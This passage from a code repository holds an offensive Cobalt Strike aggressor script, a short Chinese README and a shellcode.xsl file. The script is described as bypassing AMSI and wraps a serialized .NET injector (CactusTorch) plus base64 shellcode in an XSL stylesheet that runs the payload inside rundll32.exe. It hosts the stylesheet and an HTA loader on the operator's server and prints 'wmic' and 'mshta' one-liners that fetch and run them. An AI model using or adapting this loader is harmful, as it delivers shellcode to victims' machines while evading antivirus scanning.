201 | 	$data = $data . "\"AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA\"+\r\n";
202 | 	$data = $data . "\"UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu\"+\r\n";
203 | 	$data = $data . "\"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA\"+\r\n";
204 | 	$data = $data . "\"SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV\"+\r\n";
205 | 	$data = $data . "\"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA\"+\r\n";
206 | 	$data = $data . "\"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP\"+\r\n";
207 | 	$data = $data . "\"AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA\"+\r\n";
208 | 	$data = $data . "\"VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw\"+\r\n";
209 | 	$data = $data . "\"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA\"+\r\n";
210 | 	$data = $data . "\"LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
211 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
212 | 	$data = $data . "\"AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
213 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
214 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
215 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
216 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
217 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
218 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
219 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
220 | 	$data = $data . "\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"+\r\n";
221 | 	$data = $data . "\"AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv\"+\r\n";
222 | 	$data = $data . "\"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA\";\r\n";
223 | 	$data = $data . "var entry_class = 'cactusTorch';\r\n";
224 | 	$data = $data . "\r\n";
225 | 	$data = $data . "try {\r\n";
226 | 	$data = $data . "setversion();\r\n";
227 | 	$data = $data . "var stm = base64ToStream(serialized_obj);\r\n";
228 | 	$data = $data . "var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');\r\n";
229 | 	$data = $data . "var al = new ActiveXObject('System.Collections.ArrayList');\r\n";
230 | 	$data = $data . "var n = fmt.SurrogateSelector;\r\n";
231 | 	$data = $data . "var d = fmt.Deserialize_2(stm);\r\n";
232 | 	$data = $data . "al.Add(n);\r\n";
233 | 	$data = $data . "var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);\r\n";
234 | 	$data = $data . "o.flame(binary,code);\r\n";
235 | 	$data = $data . "} catch (e) {\r\n";
236 | 	$data = $data . "debug(e.message);\r\n";
237 | 	$data = $data . "}\r\n";
238 | 	$data = $data . "\r\n";
239 | 	$data = $data . "return 0;\r\n";
240 | 	$data = $data . "}\r\n";
241 | 	$data = $data . "\r\n";
242 | 	$data = $data . "</msxsl:script>\r\n";
243 | 	$data = $data . "<xsl:template match=\"/\">\r\n";
244 | 	$data = $data . "<xsl:value-of select=\"user:shellcode()\"/>\r\n";
245 | 	$data = $data . "</xsl:template>\r\n";
246 | 	$data = $data . "</xsl:stylesheet>\r\n";
247 | 
248 | 
249 | 	# host the script with xsl!
250 | 	$url = site_host(%options["host"], %options["port"], %options["uri"], $data, "text/plain", "Scripted Web Delivery (wmic)"); 
251 | 	
252 | 	#hta script to bypass AMSI 
253 | 	$htadata = "";
254 | 	$htadata = $htadata . "<HTML>\r\n";
255 | 	$htadata = $htadata . "<HEAD>\r\n";
256 | 	$htadata = $htadata . "</HEAD>\r\n";
257 | 	$htadata = $htadata . "<BODY>\r\n";
258 | 	$htadata = $htadata . "<script language=\"javascript\" >\r\n";
259 | 	$htadata = $htadata . "var xml = new ActiveXObject(\"Microsoft.XMLDOM\");\r\n";
260 | 	$htadata = $htadata . "xml.async = false;\r\n";
261 | 	$htadata = $htadata . "var xsl = xml;\r\n";
262 | 	$htadata = $htadata . "xsl.load(\"".$url."\");\r\n";
263 | 	$htadata = $htadata . "xml.transformNode(xsl);\r\n";
264 | 	$htadata = $htadata . "self.close();\r\n";
265 | 	$htadata = $htadata . "</script>\r\n";
266 | 	$htadata = $htadata . "</body>\r\n";
267 | 	$htadata = $htadata . "</html>\r\n";
268 | 	$htadata = $htadata . "\r\n";
269 | 
270 | 
271 | 	#tell the user our URL
272 | 	if (%options["mshta"] eq "true"){
273 | 			$htaurl = site_host(%options["host"], %options["port"], %options["htauri"], $htadata, "application/hta", "Scripted Web Delivery (mshta)"); 
274 | 			prompt_text("HTA one-liner: ", "mshta ".$htaurl."", {});
275 | 		}
276 | 		else{
277 | 			prompt_text("WMIC one-liner: ", "wmic os get /format:\"".$url."\"", {});
278 | 		}
279 | 	
280 | 
281 | }
282 | 
283 | # create a popup menu!
284 | popup attacks {
285 | 	item "AMSI bypass Web Delivery (S)" {
286 | 		local('$dialog %defaults');
287 | 
288 | 		# setup our defaults
289 | 		%defaults["uri"]  = "/a.xsl";
290 | 		%defaults["htauri"]  = "/a.png";
291 | 		%defaults["host"] = localip();
292 | 		%defaults["port"] = 8080;
293 | 		%defaults["stageless"] = "true";
294 | 		%defaults["binary"] = "rundll32.exe";
295 | 
296 | 		# create our dialog
297 | 		$dialog = dialog("AMSI bypass One-liner (Stageless)", %defaults, &setup_attack);
298 | 		dialog_description($dialog, "A stageless version of the wmic one-liner Web Delivery attack.");
299 | 		drow_text($dialog, "uri", "URI Path: ", 20);
300 | 		drow_text($dialog, "htauri", "HTAURI Path: ", 20);
301 | 		drow_text($dialog, "host", "Local Host: ");
302 | 		drow_text($dialog, "port", "Local Port: ");
303 | 		drow_listener_stage($dialog, "listener", "Listener: "); 
304 | 		drow_checkbox($dialog, "stageless", "Stageless: ", "Use Stageless Payload");
305 | 		drow_text($dialog, "binary", "Binary: ");
306 | 		dbutton_action($dialog, "Launch");
307 | 		drow_checkbox($dialog, "mshta", "Hta: ", "Use hta one liner");
308 | 		# show our dialog
309 | 		dialog_show($dialog);
310 | 	}
311 | }


--------------------------------------------------------------------------------
/README.MD:
--------------------------------------------------------------------------------
1 | # AMSI bypass
2 | 
3 | cobalt strike 加载脚本，默认未勾选mshta，bypass ASMI


--------------------------------------------------------------------------------
/shellcode.xsl:
--------------------------------------------------------------------------------
  1 | <?xml version='1.0'?>
  2 | <xsl:stylesheet version="1.0"
  3 |       xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  4 |       xmlns:msxsl="urn:schemas-microsoft-com:xslt"
  5 |       xmlns:user="http://mycompany.com/mynamespace">
  6 | <msxsl:script language="JScript" implements-prefix="user">
  7 | 
  8 | <!--   
  9 |     Use msxsl to run shellcode.
 10 |     Combine Casey Smith's msxsl POC and Cn33liz's StarFighters.
 11 |     Link:
 12 |         https://gist.github.com/subTee/d9380299ff35738723cb44f230ab39a1
 13 |         https://github.com/Cn33liz/StarFighters/blob/master/StarFighter.js
 14 | -->
 15 | var binary = "rundll32.exe";
 16 | var code = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1W5vdGVwYWQuZXhlAA==";
 17 | 
 18 | function setversion() {
 19 | var shell = new ActiveXObject('WScript.Shell');
 20 | ver = 'v4.0.30319';
 21 | try {
 22 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
 23 | } catch(e) { 
 24 | ver = 'v2.0.50727';
 25 | }
 26 | shell.Environment('Process')('COMPLUS_Version') = ver;
 27 | 
 28 | }
 29 | function debug(s) {}
 30 | function base64ToStream(b) {
 31 |     var enc = new ActiveXObject("System.Text.ASCIIEncoding");
 32 |     var length = enc.GetByteCount_2(b);
 33 |     var ba = enc.GetBytes_4(b);
 34 |     var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
 35 |     ba = transform.TransformFinalBlock(ba, 0, length);
 36 |     var ms = new ActiveXObject("System.IO.MemoryStream");
 37 |     ms.Write(ba, 0, (length / 4) * 3);
 38 |     ms.Position = 0;
 39 |     return ms;
 40 | }
 41 | 
 42 | function shellcode() {
 43 |     var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
 44 |     "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
 45 |     "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
 46 |     "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
 47 |     "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
 48 |     "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
 49 |     "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
 50 |     "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
 51 |     "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
 52 |     "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
 53 |     "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
 54 |     "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
 55 |     "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
 56 |     "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
 57 |     "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
 58 |     "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
 59 |     "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
 60 |     "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
 61 |     "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
 62 |     "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
 63 |     "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
 64 |     "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
 65 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
 66 |     "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"+
 67 |     "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
 68 |     "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"+
 69 |     "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
 70 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
 71 |     "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+
 72 |     "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+
 73 |     "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"+
 74 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+
 75 |     "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+
 76 |     "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+
 77 |     "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"+
 78 |     "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"+
 79 |     "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"+
 80 |     "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"+
 81 |     "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"+
 82 |     "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"+
 83 |     "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"+
 84 |     "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"+
 85 |     "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"+
 86 |     "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"+
 87 |     "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"+
 88 |     "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"+
 89 |     "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"+
 90 |     "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"+
 91 |     "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"+
 92 |     "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"+
 93 |     "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"+
 94 |     "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"+
 95 |     "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"+
 96 |     "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"+
 97 |     "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"+
 98 |     "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"+
 99 |     "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"+
100 |     "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"+
101 |     "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"+
102 |     "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"+
103 |     "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"+
104 |     "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"+
105 |     "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"+
106 |     "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"+
107 |     "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"+
108 |     "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"+
109 |     "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"+
110 |     "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"+
111 |     "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"+
112 |     "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"+
113 |     "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"+
114 |     "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"+
115 |     "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"+
116 |     "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"+
117 |     "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"+
118 |     "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"+
119 |     "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"+
120 |     "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"+
121 |     "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"+
122 |     "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"+
123 |     "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"+
124 |     "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"+
125 |     "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"+
126 |     "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"+
127 |     "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"+
128 |     "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"+
129 |     "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"+
130 |     "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"+
131 |     "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"+
132 |     "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"+
133 |     "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"+
134 |     "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"+
135 |     "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"+
136 |     "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"+
137 |     "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"+
138 |     "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"+
139 |     "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"+
140 |     "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"+
141 |     "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"+
142 |     "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"+
143 |     "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"+
144 |     "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"+
145 |     "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"+
146 |     "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"+
147 |     "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"+
148 |     "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"+
149 |     "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"+
150 |     "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"+
151 |     "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"+
152 |     "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"+
153 |     "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"+
154 |     "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"+
155 |     "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"+
156 |     "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"+
157 |     "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"+
158 |     "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"+
